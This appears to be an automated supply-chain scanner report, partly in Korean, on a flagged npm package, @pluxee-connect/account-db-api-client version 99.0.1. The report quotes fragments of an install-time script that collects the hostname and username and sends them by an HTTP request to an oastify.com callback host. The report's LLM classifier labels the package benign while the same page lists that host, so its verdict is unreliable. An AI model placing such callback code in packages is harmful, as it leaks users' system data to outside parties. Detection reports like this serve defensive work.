// npm 패키지
@pluxee-connect/account-db-api-client
Pluxee account database API client
버전
2
메인테이너
1
라이선스
MIT
최초 publish
2026-05-17
publisher
pengelana
tarball
2,170 B
AUTO-PUBLISHED·1개 버전 인덱싱됨·최근 publish: 2026-05-18
// exfil path
what is read → where it shipssteals
- ○ home dir
- ○ system info
sends to
(no destination string extracted — payload may be dynamic / obfuscated)
evidence in excerpt
> const OOB = '716bw4e4k31qif2nc1v658fb62ct0soh.oastify.com';
> const host = encodeURIComponent(os.hostname().slice(0, 20));
> const user = encodeURIComponent(os.userInfo().username.slice(0, 15));
> const req = http.get({
> const OOB = '716bw4e4k31qif2nc1v658fb62ct0soh.oastify.com';// offending code· @99.0.1· 1 file flagged
llm: benign · 0.85→ 의심 전송지 없음, 원격 실행 형태 없음 — 1 other host(s).
- @99.0.1··AUTO-PUBLISHED·publisher: pengelanaheuristic 75/100static flags 3llm benign (0.85) via ollamainstall-scripts:postinstallnew-publisher:8dosv-flagged:MAL-2026-3810reads-homedirreads-system-infooast-callback-domain
→ 의심 전송지 없음, 원격 실행 형태 없음 — 1 other host(s).
// NHI intent1 target·mixed harvest patterns·gate: always - AWS IMDS metadata serviceimds-aws
const OOB = '716bw4e4k31qif2nc1v658fb62ct0soh.oastify.com';
Activation gate: fires on every run. Harvest style: mixed harvest patterns.
